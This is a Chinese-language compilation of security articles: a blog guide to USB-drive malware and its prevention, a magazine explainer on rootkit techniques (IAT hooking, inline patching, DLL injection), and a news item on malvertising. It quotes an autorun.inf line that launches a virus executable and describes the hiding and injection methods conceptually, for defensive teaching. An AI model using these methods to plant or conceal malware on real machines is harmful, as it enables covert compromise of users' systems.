Shell\Explore\Command=XXX.EXE

注:XXX.EXE為病毒執行檔 (副檔名可以是.bat .cmd .scr .pif .vbs 等可執行副檔名)
代表雙擊開啟磁碟會開啟XXX.EXE
對磁碟按右鍵開啟會開啟XXX.EXE
對磁碟按右鍵檔案總管會開啟XXX.EXE

檢測方式，
最簡單的方式，
利用WinRAR開啟你的外接式硬碟
檢查有沒有可疑的執行檔和AUTORUN.INF
例圖:


預防方法:
關閉自動播放
建議是下載安裝Microsoft釋出的補丁KB971029
http://support.microsoft.com/kb/971029
關閉光碟機以外其他磁區的自動播放
並再妮的任何外接式硬碟跟目錄建立一個名為autorun.inf的資料夾~~

2.資料夾病毒
掉包你隨身碟跟目錄的資料夾，
建立假的偽裝資料夾執行檔，
引誘使用者點擊，
檢測方式，
用WinRAR開啟你的磁碟或外接式磁碟，
以下是使用 WinRAR 開啟被感染的隨身碟畫面~

被".exe"資料夾病毒感染的隨身碟...


被".scr"資料夾病毒感染的隨身碟...


被".lnk"(捷徑)資料夾病毒感染的隨身碟...


被"進階"檔案取代式資料夾病毒感染的隨身碟...


預防方式:
進到隨身碟裡面
按檢視 > 選擇 詳細資料


如果被別的電腦感染了，
請先暫時不要碰那些偽裝的資料夾，
可以下載FolderFix修復
http://www.wretch.cc/blog/krichard95/15727032

3.檔案感染
感染所有磁區.exe可執行檔
預防方法建議存放於隨身碟中的EXE檔案，
都把他們壓縮起來，
這樣子可以減少隨身碟在外，受到別台電腦的感染。

以上為目前比較常見的惡意程式傳播方式～
如有不足的地方，歡迎大家提供。

也歡迎大家轉貼...
但是請注明出處唷~~

By K.Richard

原文連結：http://www.wretch.cc/blog/krichard95/15812444

[知識]惡意程式的隱形斗蓬－rootkit

駭客七號
惡意程式的隱形斗蓬－rootkit
文／圖 吳俊達．責任編輯／陳啟川

「山啊BOT、土地BOT，現在連海阿要BOT」，這是電影「海角七號」裡的對話，意思指地方建設什麼都BOT出去了，利益都被財團瓜分，只剩下一些檢垃圾的差事留下來給地方的一段對話。有時聯想在資安的世界裡不也到處充滿著「BOT」，個人機密資料都讓駭客偷走，而剩下一堆惡意程式在用戶端的電腦中，以下將就入侵攻擊常見的rootkit技術為讀者做一詳盡的介紹。

---

看不見，可是它依舊存在──這不是在形容七月半的阿飄，而是在說一項你我電腦上隨時都有可能發生的事，rootkit。
2005年包括Celine Dion (席琳狄翁)在內的19張SONY發行的CD因為含有防盜版技術，而意外地造成「買 CD 唱片，送駭客隱形斗蓬」的安全意外。這個始作俑者就是BREPLIBOT特洛伊木馬程式家族，其利用Sony唱片防拷軟體採用的Rootkit工具留下的後門來作自我隱藏，使得病毒不易被追蹤。也使得有些公司頒出禁令:上班時間不準聽CD，免得公司被駭客入侵。
廣義來說，rootkit其實是一項技術，用來隱藏其他行程、檔案或者網路使用者。至於為什麼要隱藏這些玩意，最初的原因其實相當簡單，各位可以想像，如果有天你進行檔案備份，把一些重要的系統資訊存在備份目錄裡，你勢必不想因為哪天手賤就把這些檔案一併刪除了。因此，rootkit出於善意的用途，便能適當的隱藏你要保護的檔案。
然而駭客也可以藉由使用rootkit，隱藏他們在你電腦上的一舉一動，例如隱藏他們產生的惡意行程，進而竊取你電腦的資訊而不被發現；隱藏他們產生的惡意檔案，進而避開防毒軟體掃描而不會被刪除。這種種用途，都說明了rootkit這柄雙面刃給予駭客們的便利性，讓許多Bot蠕蟲、間諜軟體都利用這套工具來打造隱形斗篷。
rootkit的歷史
早在1990年的時候，rootkit的理念就已經被提出來了，但一直到1996年，第一隻Linux rootkit才正式出現下世人面前。當時那只rootkit只是簡單的替換掉Linux上頭的ps，login，跟netstat等執行檔。這些執行檔的功能，多半是用來顯示目前系統中有哪些行程正在執行，或者哪些網路行為正在運作。而這只Linux rootkit替換這些系統執行檔後，就會將它所指定的惡意行程隱藏起來，不被使用者發現。儘管這只rootkit很快就被人們利用檔案驗証碼，檢查該執行檔是否被替換過而解決了，但在這以後，越來越多的rootkit技術以及實作迅速出現。以最為人熟知的作業系統Windows來說，從2002年第一只在Windows 上出現的rootkit「ierk8243.sys」面世以來，每年都有數以百計的rootkit出現。根據2006年微軟惡意程式移除工具提出的報告，570萬台電腦上，就有14%的電腦被安裝過rootkit。
惡名昭彰的Sony事件
當時Sony BMG在他們發行的音樂光碟裡，加入了rootkit的技術。最初的目的只是為了保護他們的音樂不被盜拷，但由於Sony BMG的工程師們小瞧了使用rootkit會帶來的影響，他們把所有名稱前行是「$sys$」的檔案，都進行了隱藏。換句話說，如果你把電腦上的notepad.exe改名為$sys$notepad.exe，那麼在這只rootkit被移除之前，你的notepad將會暫時消失。
這件事曝光之後，不但很快就被駭客們用來隱藏他們的惡意檔案，Sony BMG更因此承受了龐大的商譽損失。只不過，用「從那裡跌倒，就從那裡再跌倒」這句話來形容Sony，恐怕是在適合不過。
2007年8月，Sony在他們發行的Sony’s MicroVault USB drives裡頭，又用上了rootkit的技術。這次主要是因為Sony這款USB提供了指紋辨識能力，為了保護指紋辨識的內容資料，他們將這些資料全放在同一個目錄裡，並將這個目錄進行了隱藏，可惜，駭客們見到了這樣一個大漏洞，哪還有不鑽的道理，於是許多惡意軟體就將他們的檔案放置在這個隱藏目錄，從而躲避過了防毒軟體的掃描。
綜合上面的敘述我們可以得知，rootkit的技術跟觀念已逐漸成為下一波駭客們關注的重點。現下，就讓我們更深一層來探討rootkit的技術以及應用。
rootkit使用的技術
有念過計算機組織的讀者必定知道，CPU在執行指令時有著不同的特權等級 (privilege level)。現代的作業系統也採用了這個理念，在執行較重要的指令 (例如作業系統核心) 或是存取較隱密關鍵的資料，都必須在CPU為高特權等級 (kernel mode) 時才能通行；反之，若是一般的使用者程式及資料則沒此限制 (user mode)，以下將就分別對rootkit在user mode和kernel mode使用的技巧一一介紹。
user mode rootkit
user mode rootkit在實作技術上難度不高，不具備系統核心開發理念的程式設計者都可以輕易的達成。user mode rootkit的流程，基本上都是在正常程式呼叫某函式時，先將執行權轉移到rootkit本身，rootkit再去呼叫真正的函式取得執行結果，並對其結果做更改或是取得權限，以達到其目的。
目前有兩種熱門方法能在user mode將程式呼叫時的執行權轉移，一種是IAT (Import Address Table) hook，另一種是Inline Function Patch。

Import Address Table Hooking (IAT Hooking)
當一個應用程式使用Win32 API時，會需要知道這些API的address，很多應用程式把這些address紀錄在IAT內。當這些應用程式需要使用Win32 API時就去IAT內查詢這些Win32 API的address然後再執行。

IAT Hooking流程圖。

IAT Hooking很容易實作，OS也時常使用這樣的模式，但其缺點是容易被偵測到。不過，雖然容易偵測，卻不容易判斷是否真的為惡意軟體利用rootkit進行IAT Hook。此外若應用程式內部使用Win32 API時是使用late binding的話 (使用 LoadLibrary & GetProcAddress)，此時IAT Hooking也會失效。

Inline Function Patch
這個模式比IAT Hooking應用更廣泛，不會被late binding影響，因為它是直接去修改目標程式在RAM中的byte code。因此不管應用程式怎么取得Win32 API的address，Inline Function Patch的機制始終有效。下圖2為Inline Function Patch簡單的示意圖。
Inline Function Patch流程圖。

Caller function呼叫被Patch的Function (FindFirstFile)。因Function的第一個instruction被rootkit替換成jmp 0x2c3d，所以程式接著執行到0x2c3d。Address 0x2c3d就是rootkit想要使用者執行的程式碼。待rootkit執行完後再回到原先的Function繼續執行下去。最後由Function將rootkit篩選過的結果回傳給Caller Function。
DLL植入 (DLL injection)
至此，聰明的讀者一定發現到了，user mode rootkit最主要的精神便是透過修改正常Process呼叫API的順序，將自己的惡意程式碼插入到呼叫順序的中間，去影響正常Process的運作或更改API的結果；或是直接給函式打「patch」以得到類似的結果。但事實上如何對其它Process進行修改？
若你曾在Windows下開發過程式，必然知道所有的Process都有自己的memory address space。例如0x12345在Process A中可能是存放字串"Foo"，但同樣的位址在Process B裡卻是字串"Bar"，此乃因為Windows的虛擬記憶體 (Virtual memory) 機制，讓每個Process都認為自己是系統上唯一的一個Process。所以Process之間是兩條平行線，沒有交集 (不考慮Process溝通機制及系統核心部份)
所以若我們想系統上其他Process做修改，一定得進入它們的memory address space。一般利用的手法便是DLL injection，而幾個常用的技巧介紹如下︰

AppInit_DLLs registry
Windows作業系統使用登錄(Registry)來做記錄系統設定及組態，在登錄中有一個特別的機碼(Key)可以讓使用者輕易的達到DLL植入。這個機碼的路徑是HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows，在此機碼下有一特別的值(Value)名稱叫做AppInit_DLLs，它的資料型態為一字串值(REG_SZ)，系統預設值是長度為零的空字串。使用者可以指定任意DLL的路徑於此機碼的值內，舉例來說︰C:\Windows\System32\MyDll.dll。你一定會很好奇，當此機碼及值被設定之後，Windows作業系統會有什麼改變呢？
當此機碼及值被設定之後，只要有任何的Process載入User32.dll，首先User32.dll會被映射到該Process的記憶體空間裡，接著User32.dll會收到DLL_PROCESS_ATTACH的系統通知，此時User32.dll會去讀取本節前面所提到的機碼及值，並且呼叫LoadLibrary系統函式來一並載入指定的DLL，此時DLL植入的目的也就達到了。用此方法來達到DLL植入是很容易的一件事，但這種方法也有一些缺點。
1. PInit_DLLs值被設定之後，之後載入User32.dll的Process才會被DLL植入，也就是說，既有已執行的Process並不會受影響。同樣的，若已經被DLL植入的Process，就算APPInit_DLLs值被刪除，也不會受到影響。
2. 此種方法只能用來植入使用User32.dll的Process，所有的圖形化使用者介面 (GUI) 程式都會使用到User32.dll，但是console程式就不一定會使用到User32.dll。
系統中通常有多個Process存在，但用此種方法無法指定DLL植入的對象。所以用這種模式做DLL植入要很小心，因為會影響到所有的圖形化使用者介面程式。

indowsHookEx
Windows中的程式是透過資訊(message)來互相溝通的，例如鍵盤或滑鼠的事件，或是視窗間主動傳遞資訊。而Windows本身亦提供了一個正式的方法讓程式設定自己的Hook，以下程式1是SetWindowsHookEx的函式宣告︰

可以看到此函式有四個參數，第一個參數是指定Hook的類別，例如，若指定為WH_KEYBOARD，代表想監聽鍵盤的message。
當idHook所指定的事件發生時，則第二個參數lpfn所指向的函式將會被呼叫，若dwThreadId為0或是自己本身以外的Process，則lpfn必須指向一個DLL所匯出 (export) 的某個函式。
第三個參數為包含lpfn的DLL handle，若dwThreadId為自己本身Process所包含的Thread，則此參數必須為NULL。
第四個參數可指定任一Thread (Thread) 的識別(ID)，則Hook只會作用在該Thread上，若其值為0，代表Hook會作用系統中所有Thread上。　
以下程式2是一段使用SetWindowsHookEx的範例程式︰

在此時DLL植入的目的也就達成了。使用SetWindowsHookEx有幾個優點︰
1. 可以指定要hook的Thread。

2. 可以呼叫系統函式UnhookWindowsHookEx將hook移除。
3. 在自訂的hook函式中(也就是範例的SysMessageProc)，可以用CallNextHookEx函式將執行權交給下一個設定hook的函式。

CreateRemoteThread
Windows有一個函式可以讓某一Process在本身以外的Process中啟始一條Thread，這個函式叫做CreateRemoteThread。以下程式3是它的函式宣告︰


這個函式看起來參數很多，但只有幾個是比較重要的，若讀者有興趣，可參閱MSDN得到完整的資訊。第一個參數hProcess是由OpenProcess或是CreateProcess所得到，其可以指定要在那一個Process啟始新的Thread。第四個參數lpStartAddress指定了要被啟始Thread的起始函式位址，此函式必須存在於hProcess所指定的Process中。第五個參數則是當新Thread開始lpStartAddress函式時，會一並傳入的參數。
若A Process要用CreateRemoteThread對B執行序達成DLL植入的目的，則要利用B執行序當中Loadlibrary函式來載入指定的DLL，詳細的範例程式如下程式4︰


此時DLL植入的目的已達到。
user mode rootkit小結
介紹到這裡，讀者應已對user mode rootkit使用的技巧有初步了解 。總結一下，惡意程式先使用DLL injection技巧 (AppInit_DLL registry、SetWindowsHookEx函式，及CreateRemoteThread函式)，將自己的DLL植入到別的Process，再利用IAT hooking或Inline Function Path的模式，影響正常Process執行的順序，來達到目的。要實作user mode rootkit的技術門檻不高，所需撰寫的程式碼並不會很多。雖然user mode rootkit簡單好作，但它也有先天上致命的缺陷，那就是容易被偵測出來，市面上大多數的Anti-rootkit軟體都具有核心驅動程式 (Kernel Driver)，可以輕易的偵測出user mode rootkit的存在。而下期我們將就kernel mode使用的技巧繼續介紹。

【原文刊載於RUN!PC雜誌：2008年11月號】

原文網址：http://www.runpc.com.tw/content/main_content.aspx?mgo=178&fid=G03

[news]Yahoo、Google廣告平台會傳送惡意程式

Yahoo、Google廣告平台會傳送惡意程式

本表顯示幾大廣告平台在上月在為期六天期間被Avast所偵測到的惡意程式傳播數量，最高的包括Yahoo與Fox。
總部設在布拉格的防毒軟體公司Avast指出，Yahoo、Fox和Google的廣告平台已成為一些惡意軟體傳播的跳板，而這些惡意軟體專門鑽熱門應用程式的安全漏洞。


去年，諸如紐約時報和保守派新聞彙整網站Drudge Report.com等高知名度網站，被發現廣告裡潛伏著病毒以及其他的惡意軟體，今年在Drudge、TechCrunch和WhitePages.com等網站也發現類似情況。這種行為被稱為「惡意廣告」(malvertising)。


如今Avast的研究員指出，問題出在一些大型廣告派送平台，包括Yahoo的Yield Manager、Fox Audience Network的Fimserve.com，以及Google的DoubleClick。前兩者合計包辦超過50%的線上廣告，DoubleClick占的比率比較小。而且，Avast指稱，有些惡意廣告最後會出現在Yahoo與Google的網站上。


Avast公關經理Lyle Frink說：「不只是小型業者，連與Google和Yahoo連結的廣告伺服器，都已遭到感染而派送惡意廣告。」


Avast Virus Labs指出，遭惡意軟體入侵最嚴重的廣告派送平台是Yield Manager和 Fimserve，但一些小型的廣告系統，包括Myspace在內，也被發現傳播惡意軟體，只是程度比較輕微罷了。


例如，一種Avast命名為"JS:Prontexi"的JavaScript程式，就透過那些廣告網路散佈。 Avast研究員Jiri Sejtko說，這是一個用script形式編寫的木馬程式(Trojan)，攻擊目標瞄準Windows作業系統，會自動搜尋Adobe Reader和Acrobat、Java、QuickTime以及 Flash內含的安全漏洞，並發出偽造的防毒警告。


Avast說，使用者不需作任何點擊動作，只要瀏覽器載入廣告，電腦就會中毒。


自從這個惡意軟體去年12月下旬開始散佈以來，Avast客戶的電腦上已記錄了超過260萬筆事例(instances)。其中Yield Manager就占了將近53萬個事例，DoubleClick占了1.63萬個。


Sejtko說：「Google占JS:Prontexi的比例很小，在他們採取行動改善情況後占的比率更是顯著降低。但Yahoo和Fox的情形就不是這樣了。」


Fox和MySpace拒絕評論。


Yahoo的代表證實這項報導，並表示正在深入了解情況，「若在罕見情況下發現某則廣告與我們的預期和準則相牴觸，我們會儘快採取行動把它移除」。


Google發言人表示，DoubleClick的安全監測系統主動發現廣告中潛在的幾個惡意軟體，已加以攔截，並調整安全措施以防範類似的惡意廣告。(唐慧文譯)

本篇文章出處：http://www.zdnet.com.tw/news/web/0,2000085679,20144717,00.htm?feed=NL:+%AC%EC%A7%DE%B7s%BBD%A4%E9%B3%F8